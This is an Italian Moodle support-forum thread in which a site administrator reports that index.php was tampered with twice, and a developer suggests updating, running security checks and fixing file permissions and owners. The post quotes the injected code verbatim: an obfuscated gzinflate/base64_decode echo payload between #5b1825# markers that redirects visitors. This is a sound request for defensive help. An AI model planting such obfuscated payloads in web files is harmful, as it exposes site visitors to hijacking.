Sicurezza

Sicurezza

di Lucia Bartoli -
Numero di risposte: 3

È la seconda volta che la nostra comunità si ritrova con i file index.php manomessi.

Entrando nella home subito appare un tentativo di apertura di altro sito.

Abbiamo sostituito i file, ma oggi è successo di nuovo.

Questa è la modifIca che troviamo subito sulla prima riga in alto del file index.php

<?php // $Id: index.php,v 1.201.2.7 2008/09/19 06:22:43 nicolasconnault Exp $

// index.php - the front page.

 

La versione in uso di Moodle al momento è 1.9.4+  ma la stessa cosa capita anche sulle altre piattafomr che usano versione 1.9.7

e non ci sembrava che la versione originale fosse di Nicolas, o forse ci sbagliamo?... purtroppo non ritrovo più il pacchetto originale.

poi prima della voce <table> ci ritroviamo questa stringa.

#5b1825#

echo(gzinflate(base64_decode("Jc1JDoMwDEDRq3jHjgBSJagwPUsGk1gigxxLvX4r2Py3/DufYjPBXVclkOAEiTgmxRm+HDT97V7qdXGJWCp08Tgk1fY2JlontrD20ddssuUyttQ+zUbC9RWIzmVb3UIzbdNwwG6e3/ED")));

#/5b1825#

qualcuno può darci delle dritte per capire come intervenire?

Grazie

 

Media dei voti:  -
In riposta a Lucia Bartoli

Re: Sicurezza

di Andrea Bicciolo -
Immagine Core developers Immagine Plugin developers Immagine Translators

Alcune indicazioni di massima:

  • mantenere le tue installazioni aggiornate. Entrambe le versioni che indichi sono piuttosto antiquate, aggiornarle ti permette di avere le fix agli eventuali problemi di sicurezza individuati. Per le release notes: http://docs.moodle.org/dev/Latest_release_notes
  • verificare che la tua installazione di Moodle sia fatta in accordo a quanto riportato nella documentazione . Un aiuto in questo aspetto te lo può dare il report sulla sicurezza, Amministrazione del sito->Report->Sicurezza.
  • accertare che il server che ospita la tua installazione non abbia vulnerabilità note o configurazioni che ne facilitino la manomissione.

Ulteriori informazioni: http://docs.moodle.org/19/en/Security

Media dei voti:  -
In riposta a Andrea Bicciolo

Re: Sicurezza

di Lucia Bartoli -

Grazie è proprio quello che temevo.. e non siamo molti esperti in aggiornamento.

Possiamo passare dalla 1.9.4 direttamente alla 1.9.14 o meglio fare passaggi successivi?

Visto che il file modificato è solo index.php.. potrebbe essere sufficiente al momento, in attesa dell'aggiornamento, cambiare i permessi dall'attuale 755 al 555?

Media dei voti:  -
In riposta a Lucia Bartoli

Re: Sicurezza

di Andrea Bicciolo -
Immagine Core developers Immagine Plugin developers Immagine Translators

La migrazione all'interno dello stesso ramo stabile in genere non presenta particolari difficoltà.

Per i file, oltre alle permission dovresti anche verificare gli owner dei file, alcuni setup hanno 644 per i file php.

Media dei voti:  -